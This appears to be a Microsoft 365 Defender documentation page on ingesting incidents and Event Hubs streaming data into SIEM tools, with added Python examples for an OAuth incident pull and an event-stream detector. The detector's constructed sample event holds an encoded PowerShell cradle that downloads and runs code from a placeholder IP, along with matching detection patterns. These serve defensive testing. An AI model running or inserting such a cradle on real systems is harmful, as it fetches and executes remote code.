Pull Microsoft 365 Defender incidents and streaming event data using security information and events management (SIEM) tools
Note
- Microsoft 365 Defender Incidents consists of collections of correlated alerts and their evidence.
- Microsoft 365 Defender Streaming API streams event data from Microsoft 365 Defender to event hubs or Azure storage accounts.
Microsoft 365 Defender supports security information and event management (SIEM) tools that ingest information from your enterprise tenant in Azure Active Directory (AAD), using the OAuth 2.0 authentication protocol with a registered AAD application that represents the specific SIEM solution or connector installed in your environment.
For more information, see:
- Microsoft 365 Defender APIs license and terms of use
- Access the Microsoft 365 Defender APIs
- Hello World example
- Get access with application context
There are two primary models to ingest security information:
- Ingesting Microsoft 365 Defender incidents and their contained alerts from a REST API in Azure.
- Ingesting streaming event data either through Azure Event Hubs or Azure Storage Accounts.
Microsoft 365 Defender currently supports the following SIEM solution integrations:
Ingesting incidents from the incidents REST API
Incident schema
For more information on Microsoft 365 Defender incident properties including contained alert and evidence entities metadata, see Schema mapping.
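The following is an added example, not code from the page or from Microsoft, of the application-context pull described above: obtain an app-only OAuth 2.0 token for the registered application with the client-credentials grant, page through incidents updated since a stored checkpoint, and flatten each incident's alerts and evidence entities into rows a SIEM field mapping can consume. The token endpoint, scope, incidents URL, OData parameters and field names are assumptions drawn from the public API shape and are labelled as such in the code; the sample incident is constructed.

```python
"""Incremental pull of Microsoft 365 Defender incidents with an app-only OAuth 2.0 token.

Assumptions, not taken from the page: the v2.0 client-credentials token endpoint,
the scope 'https://api.security.microsoft.com/.default', the incidents endpoint
with OData $filter/$top/$skip, and a response body {"value": [incident, ...]} where
each incident carries an 'alerts' list and each alert an 'entities' list.
"""
import json
import urllib.parse
import urllib.request
from datetime import datetime, timezone

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
INCIDENTS_URL = "https://api.security.microsoft.com/api/incidents"
SCOPE = "https://api.security.microsoft.com/.default"


def build_token_request(tenant_id, client_id, client_secret):
    """Client-credentials grant for the registered application (application context, no user)."""
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": SCOPE,
    }).encode("ascii")
    return TOKEN_URL.format(tenant=tenant_id), body


def request_token(tenant_id, client_id, client_secret):
    """POST the grant and return the bearer token (network call, not exercised offline)."""
    url, body = build_token_request(tenant_id, client_id, client_secret)
    with urllib.request.urlopen(urllib.request.Request(url, data=body, method="POST")) as resp:
        return json.load(resp)["access_token"]


def parse_timestamp(text):
    """API timestamps carry seven fractional digits; datetime accepts at most six."""
    text = text.rstrip("Z")
    if "." in text:
        head, frac = text.split(".", 1)
        text = f"{head}.{frac[:6]}"
    return datetime.fromisoformat(text).replace(tzinfo=timezone.utc)


def build_incidents_url(since, top=100, skip=0):
    """One page of incidents whose lastUpdateTime is strictly after the checkpoint."""
    stamp = since.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    query = urllib.parse.urlencode(
        {"$filter": f"lastUpdateTime gt {stamp}", "$top": top, "$skip": skip},
        quote_via=urllib.parse.quote, safe="$:")
    return f"{INCIDENTS_URL}?{query}"


def fetch_incidents(token, since, top=100):
    """Page through every incident updated after `since`; a short page ends the loop."""
    incidents, skip = [], 0
    while True:
        req = urllib.request.Request(build_incidents_url(since, top, skip),
                                     headers={"Authorization": f"Bearer {token}"})
        with urllib.request.urlopen(req) as resp:
            page = json.load(resp).get("value", [])
        incidents.extend(page)
        if len(page) < top:
            return incidents
        skip += top


def flatten_incident(incident):
    """One flat row per alert, carrying incident context: the shape a SIEM field mapping wants."""
    rows = []
    for alert in incident.get("alerts", []):
        entities = alert.get("entities", [])
        rows.append({
            "incident_id": incident["incidentId"],
            "incident_severity": incident.get("severity"),
            "incident_status": incident.get("status"),
            "alert_id": alert["alertId"],
            "alert_title": alert.get("title"),
            "service_source": alert.get("serviceSource"),
            "entity_types": sorted({e.get("entityType", "") for e in entities}),
            "users": sorted({e["userPrincipalName"] for e in entities if e.get("userPrincipalName")}),
            "files": sorted({e["sha256"] for e in entities if e.get("sha256")}),
        })
    return rows


def advance_checkpoint(incidents, checkpoint):
    """High-water mark for the next poll: newest lastUpdateTime seen, never moving backwards."""
    for inc in incidents:
        seen = parse_timestamp(inc["lastUpdateTime"])
        if seen > checkpoint:
            checkpoint = seen
    return checkpoint


# Constructed sample incident; field names follow the assumed schema described above.
SAMPLE_INCIDENT = {
    "incidentId": 4321, "severity": "High", "status": "Active",
    "lastUpdateTime": "2023-05-01T12:34:56.1234567Z",
    "alerts": [
        {"alertId": "alert-1", "title": "Suspicious PowerShell command line",
         "serviceSource": "MicrosoftDefenderForEndpoint",
         "entities": [{"entityType": "User", "userPrincipalName": "jdoe@corp.example"},
                      {"entityType": "File", "sha256": "a" * 64}]},
        {"alertId": "alert-2", "title": "Atypical travel",
         "serviceSource": "AzureActiveDirectoryIdentityProtection",
         "entities": [{"entityType": "User", "userPrincipalName": "jdoe@corp.example"}]},
    ],
}

if __name__ == "__main__":
    # Fill in the registered application's identifiers, then run one incremental poll.
    token = request_token("<tenant-id>", "<client-id>", "<client-secret>")
    checkpoint = parse_timestamp("2023-05-01T00:00:00Z")
    pulled = fetch_incidents(token, checkpoint)
    for inc in pulled:
        for row in flatten_incident(inc):
            print(json.dumps(row))
    print("next checkpoint:", advance_checkpoint(pulled, checkpoint).isoformat())
```

The checkpoint is the piece connectors most often get wrong: filtering on `lastUpdateTime` rather than creation time picks up incidents whose alerts or status changed after the first pull, and persisting the newest timestamp seen (never an earlier one) keeps a restart from replaying or skipping a window.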
Splunk
Use the Microsoft 365 Defender Add-on for Splunk, which supports:
- Ingesting incidents that contain alerts from the following products, which are mapped onto Splunk’s Common Information Model (CIM):
- Microsoft 365 Defender
- Microsoft Defender for Endpoint
- Microsoft Defender for Identity and Azure Active Directory Identity Protection
- Microsoft Defender for Cloud Apps
- Updating incidents in Microsoft 365 Defender from within Splunk
- Ingesting Defender for Endpoint alerts (from the Defender for Endpoint’s Azure endpoint) and updating these alerts
For more information on the Microsoft 365 Defender Add-on for Splunk, see splunkbase.
Micro Focus ArcSight
The new SmartConnector for Microsoft 365 Defender ingests incidents into ArcSight and maps them onto its Common Event Format (CEF).
For more information on the new ArcSight SmartConnector for Microsoft 365 Defender, see ArcSight Product Documentation.
The SmartConnector replaces the previous FlexConnector for Microsoft Defender for Endpoint.
Ingesting streaming event data via Event Hubs
First, configure the Streaming API to stream events from your tenant to your Event Hub or Azure Storage account. For more information, see Streaming API.
For more information on the event types supported by the Streaming API, see Supported streaming event types.
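As an added example (not code from the page, Microsoft, or any of the connectors named below), the following consumer takes one message body as the Streaming API delivers it to an Event Hub, splits the records by the advanced hunting table they belong to, and runs a small detection over the DeviceProcessEvents rows, including decoding a PowerShell `-EncodedCommand` payload. The message layout (a `records` array whose entries carry `time`, `tenantId`, `category` prefixed with `AdvancedHunting-`, and `properties` holding the table columns) is an assumption about the stream format, and the sample message is constructed.

```python
"""Consume Streaming API records from an Event Hubs message and route them by table.

Assumption, not from the page: each message body is JSON with a "records" array whose
entries carry "time", "tenantId", "category" (e.g. "AdvancedHunting-DeviceProcessEvents")
and "properties" (that table's columns). The sample message below is constructed.
"""
import base64
import json
import re
from collections import defaultdict

TABLE_PREFIX = "AdvancedHunting-"
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script):
    """Mirror of PowerShell's -EncodedCommand encoding: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample message: two process events, one network event, one malformed record.
SAMPLE_MESSAGE = json.dumps({"records": [
    {"time": "2023-05-01T12:00:01Z", "tenantId": "00000000-0000-0000-0000-000000000000",
     "operationName": "Publish", "category": "AdvancedHunting-DeviceProcessEvents",
     "properties": {"DeviceName": "ws01.corp.example", "AccountName": "jdoe",
                    "FileName": "powershell.exe", "InitiatingProcessFileName": "winword.exe",
                    "ProcessCommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(
                        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")}},
    {"time": "2023-05-01T12:00:02Z", "tenantId": "00000000-0000-0000-0000-000000000000",
     "operationName": "Publish", "category": "AdvancedHunting-DeviceNetworkEvents",
     "properties": {"DeviceName": "ws01.corp.example", "RemoteIP": "203.0.113.5", "RemotePort": 80}},
    {"time": "2023-05-01T12:00:03Z", "tenantId": "00000000-0000-0000-0000-000000000000",
     "operationName": "Publish", "category": "AdvancedHunting-DeviceProcessEvents",
     "properties": {"DeviceName": "ws02.corp.example", "AccountName": "asmith",
                    "FileName": "notepad.exe", "InitiatingProcessFileName": "explorer.exe",
                    "ProcessCommandLine": "notepad.exe C:\\notes.txt"}},
    {"time": "2023-05-01T12:00:04Z", "category": "AdvancedHunting-DeviceEvents"},  # no properties
]})


def parse_message(body):
    """Split one message into per-table record lists; returns (tables, dropped_count)."""
    tables, dropped = defaultdict(list), 0
    for record in json.loads(body).get("records", []):
        category = record.get("category", "")
        props = record.get("properties")
        if not category.startswith(TABLE_PREFIX) or not isinstance(props, dict):
            dropped += 1  # malformed or unknown record: count it rather than crash the consumer
            continue
        tables[category[len(TABLE_PREFIX):]].append({"time": record.get("time"), **props})
    return dict(tables), dropped


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    match = ENCODED_FLAG.search(cmdline or "")
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_suspicious_process(event):
    """Heuristics over one DeviceProcessEvents row; returns the reasons that fired, in order."""
    reasons = []
    decoded = decode_encoded_command(event.get("ProcessCommandLine"))
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        if re.search(r"downloadstring|invoke-webrequest|\biwr\b", decoded, re.IGNORECASE):
            reasons.append("decoded payload fetches remote content")
    parent = (event.get("InitiatingProcessFileName") or "").lower()
    if parent in OFFICE_PARENTS and (event.get("FileName") or "").lower() in SHELLS:
        reasons.append(f"shell spawned by Office process {parent}")
    return reasons


def run_detections(body):
    """Parse a message and return one finding per process event that tripped a heuristic."""
    tables, _ = parse_message(body)
    findings = []
    for event in tables.get("DeviceProcessEvents", []):
        reasons = detect_suspicious_process(event)
        if reasons:
            findings.append({"time": event["time"], "device": event.get("DeviceName"),
                             "account": event.get("AccountName"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in run_detections(SAMPLE_MESSAGE):
        print(json.dumps(finding))
```

Routing on the `category` prefix is what lets one consumer feed every supported event type into the right SIEM index or data model, and counting rather than raising on malformed records keeps a single bad message from stalling the Event Hub partition.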
Splunk
Use the Splunk Add-on for Microsoft Cloud Services to ingest events from Azure Event Hubs.
For more information on the Splunk Add-on for Microsoft Cloud Services, see splunkbase.
IBM QRadar
Use the new IBM QRadar Microsoft 365 Defender Device Support Module (DSM), which uses the Microsoft 365 Defender Streaming API to ingest streaming event data from Microsoft 365 Defender products. For more information on supported event types, see Supported event types.